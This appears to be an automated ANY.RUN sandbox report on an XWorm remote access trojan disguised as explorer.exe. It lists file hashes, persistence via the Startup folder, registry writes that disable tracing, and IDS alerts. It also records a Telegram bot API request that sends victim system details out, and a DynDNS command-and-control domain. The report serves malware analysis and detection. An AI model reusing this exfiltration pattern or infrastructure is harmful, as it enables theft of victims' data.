File name:	explorer.exe
Full analysis:	https://app.any.run/tasks/782b6a7e-c8a9-446d-a890-929a7a50ff89
Verdict:	Malicious activity
Threats:	XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails. XWorm ist ein Remote Access Trojaner (RAT), der als Malware-as-a-Service verkauft wird. Er verfügt über ein umfangreiches Hacking-Toolset und ist in der Lage, private Informationen und Dateien auf dem infizierten Computer zu sammeln, MetaMask- und Telegram-Konten zu kapern und Benutzeraktivitäten zu verfolgen. XWorm wird in der Regel durch mehrstufige Angriffe auf die Computer der Opfer übertragen, die mit Phishing-E-Mails beginnen. Malware Trends Tracker >>>
Analysis date:	October 26, 2024, 15:05:02
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	evasion telegram xworm crypto-regex remote
Indicators:
MIME:	application/vnd.microsoft.portable-executable
File info:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:	3E92A515098CAF4967806178C4736B1F
SHA1:	1001F412C6056FD4984D4D6BA3316011F21DE2FB
SHA256:	8BC4584A004FC5D9EE501A4DC9579111D8649B63C68445C74E48A6D3CFC58BE0
SSDEEP:	1536:FsSucOD5mMGPrSsh0v7sb+3yCQIq6AX4bOMGjj3/URT6t6i:FsbtGjMIb+36IUXkOMm4sN

.exe	\|	Generic CIL Executable (.NET, Mono, etc.) (56.7)
.exe	\|	Win64 Executable (generic) (21.3)
.scr	\|	Windows screen saver (10.1)
.dll	\|	Win32 Dynamic Link Library (generic) (5)
.exe	\|	Win32 Executable (generic) (3.4)

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2024:10:25 21:27:59+00:00
ImageFileCharacteristics:	Executable, 32-bit
PEType:	PE32
LinkerVersion:	11
CodeSize:	89600
InitializedDataSize:	13824
UninitializedDataSize:	-
EntryPoint:	0x17c4e
OSVersion:	4
ImageVersion:	-
SubsystemVersion:	4
Subsystem:	Windows GUI
FileVersionNumber:	1.0.0.0
ProductVersionNumber:	1.0.0.0
FileFlagsMask:	0x003f
FileFlags:	(none)
FileOS:	Win32
ObjectFileType:	Executable application
FileSubtype:	-
LanguageCode:	Neutral
CharacterSet:	Unicode
FileDescription:
FileVersion:	1.0.0.0
InternalName:	explorer.exe
LegalCopyright:
OriginalFileName:	explorer.exe
ProductVersion:	1.0.0.0
AssemblyVersion:	1.0.0.0


(PID) Process:	(5328) explorer.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\explorer_RASAPI32
Operation:	write	Name:	EnableFileTracing
Value: 0
(PID) Process:	(5328) explorer.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\explorer_RASAPI32
Operation:	write	Name:	EnableAutoFileTracing
Value: 0
(PID) Process:	(5328) explorer.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\explorer_RASAPI32
Operation:	write	Name:	EnableConsoleTracing
Value: 0
(PID) Process:	(5328) explorer.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\explorer_RASAPI32
Operation:	write	Name:	FileTracingMask
Value:
(PID) Process:	(5328) explorer.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\explorer_RASAPI32
Operation:	write	Name:	ConsoleTracingMask
Value:
(PID) Process:	(5328) explorer.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\explorer_RASAPI32
Operation:	write	Name:	MaxFileSize
Value: 1048576
(PID) Process:	(5328) explorer.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\explorer_RASAPI32
Operation:	write	Name:	FileDirectory
Value: %windir%\tracing
(PID) Process:	(5328) explorer.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\explorer_RASMANCS
Operation:	write	Name:	EnableFileTracing
Value: 0
(PID) Process:	(5328) explorer.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\explorer_RASMANCS
Operation:	write	Name:	EnableAutoFileTracing
Value: 0
(PID) Process:	(5328) explorer.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\explorer_RASMANCS
Operation:	write	Name:	EnableConsoleTracing
Value: 0

PID	Process	Filename		Type
5328	explorer.exe	C:\Users\admin\explorer.exe		executable
		MD5:3E92A515098CAF4967806178C4736B1F	SHA256:8BC4584A004FC5D9EE501A4DC9579111D8649B63C68445C74E48A6D3CFC58BE0
5328	explorer.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk		lnk
		MD5:A02E5B6B12E32B6EA90FF0BB735024C6	SHA256:E19D56A7FEB5E1FA4940446C7431C2150F1E76CF9F36CF35EB56B51157EA022A

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
6944	svchost.exe	GET	200	23.48.23.143:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
5488	MoUsoCoreWorker.exe	GET	200	23.48.23.143:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
2444	RUXIMICS.exe	GET	200	23.48.23.143:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
5488	MoUsoCoreWorker.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
6944	svchost.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
2444	RUXIMICS.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
5328	explorer.exe	GET	200	208.95.112.1:80	http://ip-api.com/line/?fields=hosting	unknown	—	—	shared
—	—	GET	404	149.154.167.99:443	https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3C54740F7CC0F23B53E5%0D%0A%0D%0AUserName%20:%20admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20%20i5-6400%20%20@%202.70GHz%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%203.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6	unknown	binary	55 b	whitelisted
—	—	POST	204	104.126.37.171:443	https://www.bing.com/threshold/xls.aspx	unknown	—	—	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
6944	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
5488	MoUsoCoreWorker.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
2444	RUXIMICS.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
6944	svchost.exe	23.48.23.143:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
5488	MoUsoCoreWorker.exe	23.48.23.143:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
2444	RUXIMICS.exe	23.48.23.143:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
6944	svchost.exe	184.30.21.171:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
5488	MoUsoCoreWorker.exe	184.30.21.171:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	51.104.136.2	whitelisted
google.com	216.58.206.46	whitelisted
crl.microsoft.com	23.48.23.143 23.48.23.156	whitelisted
www.microsoft.com	184.30.21.171	whitelisted
ip-api.com	208.95.112.1	shared
api.telegram.org	149.154.167.220	malicious
www.bing.com	104.126.37.123 104.126.37.185 104.126.37.130 104.126.37.170 104.126.37.162 104.126.37.153 104.126.37.154 104.126.37.178 104.126.37.171	whitelisted
pakoxff.zapto.org	105.156.169.35	unknown
self.events.data.microsoft.com	20.50.201.200	whitelisted

PID	Process	Class	Message
2172	svchost.exe	Device Retrieving External IP Address Detected	INFO [ANY.RUN] External IP Check (ip-api .com)
2172	svchost.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
5328	explorer.exe	Device Retrieving External IP Address Detected	POLICY [ANY.RUN] External Hosting Lookup by ip-api
5328	explorer.exe	Device Retrieving External IP Address Detected	ET POLICY External IP Lookup ip-api.com
2172	svchost.exe	Misc activity	SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2172	svchost.exe	Misc activity	ET HUNTING Telegram API Domain in DNS Lookup
5328	explorer.exe	Misc activity	ET HUNTING Telegram API Certificate Observed
5328	explorer.exe	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
—	—	Misc activity	ET HUNTING Telegram API Request (GET)
2172	svchost.exe	Potentially Bad Traffic	ET POLICY DNS Query to DynDNS Domain *.zapto .org

General Info

explorer.exe

3E92A515098CAF4967806178C4736B1F

1001F412C6056FD4984D4D6BA3316011F21DE2FB

8BC4584A004FC5D9EE501A4DC9579111D8649B63C68445C74E48A6D3CFC58BE0

1536:FsSucOD5mMGPrSsh0v7sb+3yCQIq6AX4bOMGjj3/URT6t6i:FsbtGjMIb+36IUXkOMm4sN

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Changes the autorun value in the registry

Uses Task Scheduler to run other applications

Create files in the Startup directory

XWORM has been detected (YARA)

XWORM has been detected (SURICATA)

SUSPICIOUS

Executable content was dropped or overwritten

Reads security settings of Internet Explorer

The process creates files with name similar to system file names

Reads the date of Windows installation

Checks for external IP

Found regular expressions for crypto-addresses (YARA)

Connects to unusual port

Process communicates with Telegram (possibly using it as an attacker's C2 server)

Contacting a server suspected of hosting an CnC

The process executes via Task Scheduler

INFO

Reads the computer name

Checks supported languages

Disables trace logs

Reads the machine GUID from the registry

Checks proxy server information

Reads Environment values

Process checks computer location settings

The process uses the downloaded file

Creates files or folders in the user directory

Reads the software policy settings

Attempting to use instant messaging service

Malware configuration

XWorm

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Malware configuration

XWorm

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings